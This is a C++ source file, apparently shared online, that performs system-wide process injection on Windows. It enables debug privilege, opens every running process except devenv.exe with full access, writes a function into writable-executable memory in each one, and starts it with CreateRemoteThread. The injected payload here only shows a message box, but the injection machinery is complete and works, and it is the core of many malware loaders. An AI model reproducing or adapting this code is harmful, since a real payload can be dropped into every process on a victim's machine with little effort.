1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93
|
#include<Windows.h>
#include<TlHelp32.h>
#include<iostream>
using namespace std;
typedef int (WINAPI* msgparam)(HWND, LPSTR , LPSTR , UINT);
typedef int (WINAPI* sleep)(_In_ DWORD szMillieseconds);
struct PARAMETER{
DWORD MshInj;
};
DWORD getPid(string procName);
int privileges();
DWORD Injection(PARAMETER* structure);
DWORD FunctionStub();
int main()
{
privileges();
PROCESSENTRY32 Process;
HANDLE hProcess;
hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
Process32First(hProcess,&Process);
while(Process32Next(hProcess,&Process))
{
cout<<Process.szExeFile<<endl;
if(strcmp(Process.szExeFile , "devenv.exe")==0)
{
goto hello;
}
DWORD PID = getPid(Process.szExeFile);
if(PID == 0) {}
HANDLE OpenRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,false,PID);
if(OpenRemoteProcess == 0) { _asm {nop}; }
PARAMETER injectedParameters;
injectedParameters.MshInj = (DWORD) GetProcAddress(LoadLibrary("User32.dll"),"MessageBoxA");
DWORD szFunctionSize = (PBYTE) FunctionStub - (PBYTE) Injection;
LPVOID szFunctionAllocation = VirtualAllocEx(OpenRemoteProcess,0,szFunctionSize,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(OpenRemoteProcess,szFunctionAllocation,(void*)Injection,szFunctionSize,0);
LPVOID szParameterAddress = VirtualAllocEx(OpenRemoteProcess,0,sizeof(PARAMETER),MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(OpenRemoteProcess,szParameterAddress,&injectedParameters,sizeof(PARAMETER),0);
HANDLE Thread = CreateRemoteThread(OpenRemoteProcess,0,0,(LPTHREAD_START_ROUTINE)szFunctionAllocation,szParameterAddress,0,0);
if(Thread != 0 ) {
WaitForSingleObject(Thread,INFINITE);
}
hello:;
}
return 0;
}
DWORD getPid(string procName){
HANDLE hsnap;
PROCESSENTRY32 pt;
hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pt.dwSize = sizeof(PROCESSENTRY32);
do{
if(!strcmp(pt.szExeFile, procName.c_str())){
DWORD pid = pt.th32ProcessID;
CloseHandle(hsnap);
return pid;
}
} while(Process32Next(hsnap, &pt));
CloseHandle(hsnap);
return 0;
}
DWORD Injection(PARAMETER* structure)
{
msgparam msgbox = (msgparam) structure->MshInj;
msgbox(0,"Hello from Partial System Wide Injection","Injection",MB_OK|MB_SYSTEMMODAL|MB_NOFOCUS);
return 0;
}
DWORD FunctionStub(){
return 0;
}
int privileges(){
HANDLE Token;
TOKEN_PRIVILEGES tp;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token))
{
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){
return 1; //FAIL
}else{
return 0; //SUCCESS
}
}
return 1;
}
|